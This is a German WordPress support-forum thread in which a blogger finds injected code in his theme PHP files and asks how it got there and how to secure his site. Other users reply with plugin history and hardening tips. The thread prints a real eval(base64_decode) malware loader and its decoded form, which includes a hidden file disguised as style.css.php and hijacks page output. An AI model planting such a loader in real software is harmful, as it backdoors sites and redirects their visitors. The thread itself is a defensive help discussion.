eval base 64 code ???

  • Hi,

    hab grad festgestellt, dass ich meine theme-Dateien nicht ändern kann... kein Zugriff.
    Daraufhin hab ich im Forum gesucht und nachdem ich ein Plugin deaktiviert hab, kann ich wieder zugreifen.

    Das Plugin war: Admin SSL v. 1.4.1
    Nach der Deaktivierung hab ich da fremden Code drin:

    PHP
    <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lcGFnZXMvdTMzMDIwL29wZW54L2xpYi9wZWFyL0hUTUwvVGVtcGxhdGUvRmxleHkvQ29tcGlsZXIvU3RhbmRhcmQvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

    Ich hatte eigentlich seinerzeit die 2.9.2 Version installiert, um meinen Blog sicherer zu bekommen.

    ich will den Code einfach rausschmeißen, aber wie kann ich da sicherer werden?

    BG Chris :-)

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • FWIW:

    Zitat

    bcg 12 June 2009 at 5:38pm
    Hi guys
    I am aware that Admin SSL has stopped working in WordPress 2.8, I will hopefully have some time over the weekend to look into it and get it working again.
    Cheers
    bcg

    Zitat

    bcg 10 July 2009 at 11:45am
    Dear all – I’m going to close this page for comments while I work on support for WordPress 2.8, I keep hoping I’ll have a day to do it, hopefully I’ll have some time in the next few days.
    bcg

    Seither ist Sendepause beim Entwickler des Plugins.

  • gut... vielen Dank für die Info.

    Was ist mit dem offensichtlichen Sicherheitsproblem bzgl. des Fremdcodes?
    Wo ist die Sicherheitslücke?

    BG Chris :-)

  • Eval = Evil

    Der base64 lautet entschlüsselt:

    PHP
    if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/homepages/u33020/openx/lib/pear/HTML/Template/Flexy/Compiler/Standard/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

    Ob sicherheitstechnisch bedenklich? Keine Ahnung

  • Danke für die Antworten...

    Domino5702
    in allen php-Dateien

    D4N13L
    hatte das Problem auch schon mit einem anderen Blog mit viel Traffic.
    Resultat:
    Sobald jemand einen meiner Links bei Google angeklickt hat, wurde der User zu einer Viagra Seite geschickt.
    Außerdem... wie kann mir jemand diesen Code da reinkleben?
    ...und was initiiert dieser übersetzte Code diesmal?

    BG Chris :-)

  • Was der Code genau macht versteh ich nicht, wie er reinkommen kann. Durch Sicherheitslücken in WP. Durch gehackten Admin Account, durch fehlerhafte Rechte in den Themes, durch Plugin ...

    in allen PHP Dateien??? oh shit

  • Vielen Dank für die Antworten,
    gibt es irgendwo eine Checklist, welche Eingänge geschlossen werden sollten? bzw. welche Themes, welche Plugins, etc?

    BG Chris :-)

  • Nein, nicht wirklich. Gute .htaccess machen, Zugriffsrechte auf Ordner und Dateien ändern zB: 0755. Ich nehm bei allen Scripts, die ich lade immer die Versionsnummer raus, indem ich sie bei wp_enqueue_script auf '0.0' setze. Weiters den wp_generator Link, Live Writer, etc. Dann weiß der Angreifer wenigstens nicht, bei welcher Version er welche Sicherheitslücke schließen muss. Weiters lange Passwörter ~12 Zeichen mit Sonderzeichen wie "!,",§,.;,,etc." verwenden. Allen Rollen unter Admin mit remove_cap('edit_users') reduzieren, usw.

  • ...Deinem Admin nicht "admin" zum Login geben sondern ein anderen Benutzernamen und darauf achten das dieser nicht die ID 1 hat.

    Das Limit Login Attempts Plugin benutzen um Brute Force vorzubeugen.

    Hierzu gibt es einen super Artikel von Bueltge (Schnellhilfe wenn WP gehackt wurde)

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!